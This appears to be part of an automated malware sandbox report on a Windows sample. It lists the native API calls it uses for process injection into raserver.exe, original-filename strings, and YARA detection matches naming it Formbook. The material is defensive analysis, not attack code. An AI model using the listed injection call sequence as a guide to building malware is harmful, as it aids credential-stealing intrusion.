          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999540 NtReadFile,LdrInitializeThunk,3_2_01999540
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999780 NtMapViewOfSection,LdrInitializeThunk,3_2_01999780
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019997A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_019997A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999710 NtQueryInformationToken,LdrInitializeThunk,3_2_01999710
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019996E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_019996E0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01999660
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019999D0 NtCreateProcessEx,3_2_019999D0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999950 NtQueueApcThread,3_2_01999950
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019998A0 NtWriteVirtualMemory,3_2_019998A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999820 NtEnumerateKey,3_2_01999820
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0199B040 NtSuspendThread,3_2_0199B040
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0199A3B0 NtGetContextThread,3_2_0199A3B0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999B00 NtSetValueKey,3_2_01999B00
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999A80 NtOpenDirectoryObject,3_2_01999A80
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999A10 NtQuerySection,3_2_01999A10
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019995F0 NtQueryInformationFile,3_2_019995F0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0199AD30 NtSetContextThread,3_2_0199AD30
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999520 NtWaitForSingleObject,3_2_01999520
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999560 NtWriteFile,3_2_01999560
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999FE0 NtCreateMutant,3_2_01999FE0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0199A710 NtOpenProcessToken,3_2_0199A710
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999730 NtQueryVirtualMemory,3_2_01999730
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0199A770 NtOpenThread,3_2_0199A770
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999770 NtSetInformationFile,3_2_01999770
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999760 NtOpenProcess,3_2_01999760
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019996D0 NtCreateKey,3_2_019996D0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999610 NtEnumerateValueKey,3_2_01999610
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999650 NtQueryValueKey,3_2_01999650
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999670 NtQueryInformationProcess,3_2_01999670
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B495D0 NtClose,LdrInitializeThunk,12_2_04B495D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49540 NtReadFile,LdrInitializeThunk,12_2_04B49540
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B496E0 NtFreeVirtualMemory,LdrInitializeThunk,12_2_04B496E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B496D0 NtCreateKey,LdrInitializeThunk,12_2_04B496D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49660 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_04B49660
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49650 NtQueryValueKey,LdrInitializeThunk,12_2_04B49650
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49780 NtMapViewOfSection,LdrInitializeThunk,12_2_04B49780
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49FE0 NtCreateMutant,LdrInitializeThunk,12_2_04B49FE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49710 NtQueryInformationToken,LdrInitializeThunk,12_2_04B49710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49860 NtQuerySystemInformation,LdrInitializeThunk,12_2_04B49860
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49840 NtDelayExecution,LdrInitializeThunk,12_2_04B49840
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B499A0 NtCreateSection,LdrInitializeThunk,12_2_04B499A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49910 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_04B49910
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A50 NtCreateFile,LdrInitializeThunk,12_2_04B49A50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B495F0 NtQueryInformationFile,12_2_04B495F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4AD30 NtSetContextThread,12_2_04B4AD30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49520 NtWaitForSingleObject,12_2_04B49520
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49560 NtWriteFile,12_2_04B49560
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49610 NtEnumerateValueKey,12_2_04B49610
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49670 NtQueryInformationProcess,12_2_04B49670
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B497A0 NtUnmapViewOfSection,12_2_04B497A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49730 NtQueryVirtualMemory,12_2_04B49730
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4A710 NtOpenProcessToken,12_2_04B4A710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4A770 NtOpenThread,12_2_04B4A770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49770 NtSetInformationFile,12_2_04B49770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49760 NtOpenProcess,12_2_04B49760
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B498A0 NtWriteVirtualMemory,12_2_04B498A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B498F0 NtReadVirtualMemory,12_2_04B498F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49820 NtEnumerateKey,12_2_04B49820
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4B040 NtSuspendThread,12_2_04B4B040
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B499D0 NtCreateProcessEx,12_2_04B499D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49950 NtQueueApcThread,12_2_04B49950
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A80 NtOpenDirectoryObject,12_2_04B49A80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A20 NtResumeThread,12_2_04B49A20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A10 NtQuerySection,12_2_04B49A10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49A00 NtProtectVirtualMemory,12_2_04B49A00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B4A3B0 NtGetContextThread,12_2_04B4A3B0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B49B00 NtSetValueKey,12_2_04B49B00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9D50 NtCreateFile,12_2_00AA9D50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9E80 NtClose,12_2_00AA9E80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9E00 NtReadFile,12_2_00AA9E00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9F30 NtAllocateVirtualMemory,12_2_00AA9F30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9DA9 NtReadFile,12_2_00AA9DA9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9E7A NtClose,12_2_00AA9E7A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AA9F2D NtAllocateVirtualMemory,12_2_00AA9F2D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5FB200_2_00B5FB20
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5C2B00_2_00B5C2B0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B594B00_2_00B594B0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_00B5F73D0_2_00B5F73D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E4E580_2_0B4E4E58
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8E6A0_2_0B4E8E6A
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4EBD680_2_0B4EBD68
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E65780_2_0B4E6578
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4EA52C0_2_0B4EA52C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E45880_2_0B4E4588
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E42400_2_0B4E4240
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E88900_2_0B4E8890
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E88A00_2_0B4E88A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8E5E0_2_0B4E8E5E
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8EEC0_2_0B4E8EEC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8C8C0_2_0B4E8C8C
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 0_2_0B4E8C980_2_0B4E8C98
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041D0693_2_0041D069
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041DA973_2_0041DA97
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041D5C93_2_0041D5C9
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00402D8D3_2_00402D8D
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00409E2B3_2_00409E2B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00409E303_2_00409E30
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0041DF793_2_0041DF79
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019799BF3_2_019799BF
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0195F9003_2_0195F900
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019741203_2_01974120
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196B0903_2_0196B090
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A220A83_2_01A220A8
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019820A03_2_019820A0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A228EC3_2_01A228EC
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2E8243_2_01A2E824
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A110023_2_01A11002
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A8303_2_0197A830
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198EBB03_2_0198EBB0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0198ABD83_2_0198ABD8
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1DBD23_2_01A1DBD2
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A103DA3_2_01A103DA
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A22B283_2_01A22B28
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197A3093_2_0197A309
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0197AB403_2_0197AB40
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A222AE3_2_01A222AE
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A0FA2B3_2_01A0FA2B
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019825813_2_01982581
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196D5E03_2_0196D5E0
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A225DD3_2_01A225DD
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A22D073_2_01A22D07
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01950D203_2_01950D20
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A21D553_2_01A21D55
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_0196841F3_2_0196841F
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1D4663_2_01A1D466
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A21FF13_2_01A21FF1
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A2DFCE3_2_01A2DFCE
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A22EF73_2_01A22EF7
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01976E303_2_01976E30
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01A1D6163_2_01A1D616
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC449612_2_04BC4496
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1841F12_2_04B1841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCD46612_2_04BCD466
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3258112_2_04B32581
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC2D8212_2_04BC2D82
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1D5E012_2_04B1D5E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD25DD12_2_04BD25DD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B00D2012_2_04B00D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD2D0712_2_04BD2D07
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD1D5512_2_04BD1D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD2EF712_2_04BD2EF7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B26E3012_2_04B26E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCD61612_2_04BCD616
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD1FF112_2_04BD1FF1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BDDFCE12_2_04BDDFCE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B320A012_2_04B320A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD20A812_2_04BD20A8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B1B09012_2_04B1B090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD28EC12_2_04BD28EC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2A83012_2_04B2A830
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BDE82412_2_04BDE824
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC100212_2_04BC1002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B299BF12_2_04B299BF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2412012_2_04B24120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B0F90012_2_04B0F900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD22AE12_2_04BD22AE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC4AEF12_2_04BC4AEF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BBFA2B12_2_04BBFA2B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3EBB012_2_04B3EBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BB23E312_2_04BB23E3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BC03DA12_2_04BC03DA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B3ABD812_2_04B3ABD8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BCDBD212_2_04BCDBD2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04BD2B2812_2_04BD2B28
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2A30912_2_04B2A309
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_04B2AB4012_2_04B2AB40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AAD06912_2_00AAD069
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AADA9712_2_00AADA97
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A92D8D12_2_00A92D8D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A92D9012_2_00A92D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A99E2B12_2_00A99E2B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A99E3012_2_00A99E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00A92FB012_2_00A92FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 12_2_00AADF7912_2_00AADF79
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: String function: 0195B150 appears 87 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 04B0B150 appears 133 times
          Source: XhU4EXUp0x.exe, 00000000.00000002.657834635.0000000005920000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000000.00000000.643332701.0000000000420000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameProfileOptimization.exe8 vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000000.00000002.653237651.00000000009F0000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000003.00000002.707120497.0000000000F40000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameProfileOptimization.exe8 vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000003.00000002.707570278.0000000001689000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exe, 00000003.00000002.708280098.0000000001BDF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exeBinary or memory string: OriginalFilenameProfileOptimization.exe8 vs XhU4EXUp0x.exe
          Source: XhU4EXUp0x.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
